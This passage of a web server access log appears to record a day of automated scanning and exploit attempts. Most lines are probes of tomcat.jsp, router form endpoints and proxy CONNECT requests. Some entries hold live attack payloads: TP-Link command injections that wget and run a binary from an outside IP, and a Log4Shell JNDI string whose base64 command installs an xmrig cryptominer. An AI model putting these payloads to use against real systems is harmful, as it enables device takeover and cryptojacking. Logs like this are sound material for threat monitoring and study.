/tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 104.168.70.165 - - [05/Jul/2024:20:28:43 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [05/Jul/2024:20:35:34 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:37 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:38 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:39 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:35:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:20:36:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 87.121.69.27 - - [05/Jul/2024:21:04:54 
+0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.105.128.13 - - [05/Jul/2024:21:34:55 +0200] "-" 400 1930 185.191.126.213 - - [05/Jul/2024:21:43:15 +0200] "GET / HTTP/1.1" 200 1895 187.202.148.32 - - [05/Jul/2024:21:51:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 45.148.10.174 - - [05/Jul/2024:22:04:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:22:04:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.33.109.8 - - [05/Jul/2024:22:04:27 +0200] "GET / HTTP/1.1" 200 1895 192.155.90.118 - - [05/Jul/2024:22:04:49 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.240 - - [05/Jul/2024:22:06:33 +0200] "GET / HTTP/1.0" 200 1895 41.233.159.231 - - [05/Jul/2024:22:10:02 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.27 - - [05/Jul/2024:22:20:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.144 - - [05/Jul/2024:22:27:20 +0200] "GET 
/t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1213 23.94.0.83 - - [05/Jul/2024:23:19:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.107 - - [05/Jul/2024:23:37:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [05/Jul/2024:23:38:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [05/Jul/2024:23:38:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729